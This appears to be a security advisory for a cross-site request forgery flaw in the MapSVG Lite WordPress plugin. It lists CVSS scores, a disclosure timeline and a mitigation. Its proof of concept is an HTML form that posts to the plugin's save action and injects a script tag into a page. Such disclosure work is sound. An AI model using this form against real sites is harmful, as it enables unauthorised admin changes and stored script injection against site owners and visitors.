CSRF in MapSVG Lite could allow an attacker to do almost anything an admin can


Last revised:

The plugin uses REST requests to modify post data, and does not check the nonce when doing so.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability
Score 5.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

  • Install the plugin on a site at http://localhost/
  • Ensure you have page with ID of 2.
  • Whilst logged in, visit an html page with this content and submit the form:
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=mapsvg_save">
 <input type="text" name="data[title]" value="A bad value">
 <input type="text" name="data[mapsvg_data]" value="<script>alert('hello')</script>">
 <input type="text" name="data[map_id]" value="2">
 <input type="submit">
  • Visit the page with ID of 2. It now has title of “A bad value” and alerts “hello” on loading.

Advisory timeline

  • 2018-04-10: Discovered
  • 2018-06-15: Author notified via email
  • 2018-06-15: Author replied, advised fix to be published in next release
  • 2019-01-08: Advisory published
  • 2019-01-08: CVE requested

Mitigation/further actions

Disable the plugin until a fix is released.